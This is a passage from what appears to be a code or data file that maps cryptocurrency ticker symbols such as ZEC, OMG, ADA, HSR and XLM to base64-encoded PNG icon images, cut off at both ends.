DBytXrFjBTvEfFwEXqEpOTlZr16415tWmTZvUtGnTjG+WkUdJYeEqdfjw4V9g9AvMEVIckHKem5DeFbxy5cq23bt3t+C+FwPAeXkB8zMcyKdw14+/iPBck7W0tDRVVlb25/Xr1zcaBt7Vacx9cEQO2VvxGHzMyZOnjm3ZskUigPnR4uJiPTs7W3GEVq/+mqtbjG/btm0Yj5gfsYfRj8nk1zX29bG/8Hy8TvD8+vLAgQPVS5YsUTExsaq4uGQUqRi1WMJVfn6+OnToUCWub4FvtvPu3mB2A3oymBBOgPrTxqsX98JOPNP39/W545Ty8WPlRUlJyQ+FhYVn/DrM2KNjD6dt8sj/3684DdCZipb6qbq6+iSMOfxWPjrcfwF7MkJrLhVUDAAAAABJRU5ErkJggg==',
'ZEC': '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',
'OMG': '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',
'ADA': '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',
'HSR': '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',
'XLM': 'iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAAXNSR0IArs4c6QAAACBjSFJNAAB6JgAAgIQAAPoAAACA6AAAdTAAAOpgAAA6mAAAF3CculE8AAAACXBIWXMAABYlAAAWJQFJUiTwAAABWWlUWHRYTUw6Y29tLmFkb2JlLnhtcAAAAAAAPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iWE1QIENvcmUgNS40LjAiPgogICA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPgogICAgICA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIgogICAgICAgICAgICB4bWxuczp0aWZmPSJodHRwOi8vbnMuYWRvYmUuY29tL3RpZmYvMS4wLyI+CiAgICAgICAgIDx0aWZmOk9yaWVudGF0aW9uPjE8L3RpZmY6T3JpZW50YXRpb24+CiAgICAgIDwvcmRmOkRlc2NyaXB0aW9uPgogICA8L3JkZjpSREY+CjwveDp4bXBtZXRhPgpMwidZAAAGP0lEQVRYCcVWfUwURxR/s7twch/yJR93YCriF1wV6lVBqBargWiwxpbDWm1jjRajtRpLk9qm5UhMGmvaVJtoQ9BiNS1CK/KhgopcrfzTalqN0GKBYNETVOAODs67293pzMLx4d2BRExfspnZefPe7zdv3nu7AP+zoAnGRwaDgfpkTCYT0mg0AnkXJxjD3R0BYfRFRay7RlqZ6EOOhNHr9YPAKQDK5SteS1yRuXHTu7s+Mnx+8PALdDclONJq6O1p2LlscXp6+sywWXO3xsTGrI58blqUWqNhFCoFnD1VcumzXduWYYwRETwEOzTjhqbjmlFwyeGGrF3ZCS8l5y5e9oo8ICAAACFgGcSTgQsKCZm3LmFZGAFv90bCa2hGo0PCLtnt2JPz5dtZm/e//maGXDVZxYuiIAJB6uuzsYIAEDwlxL/VYQ+nvnJzc10RG+F63BEg98mRh9ev37Lm5dS03TFarVBZXoXs3V2cQI4dvzARIiIjCQjGCoXCZ2qcVg1/XLleFxv71ASkEqPg2dlvKeTquC8WJi0CY/UlmBcZwuh0adDV1QUnKypBrkyFsNBg6Y4YkfEI7ArDmFdA7y4lxUAjhQm4VNPtPVM+SFu1agYvCLz1QTur080HgcQ8MD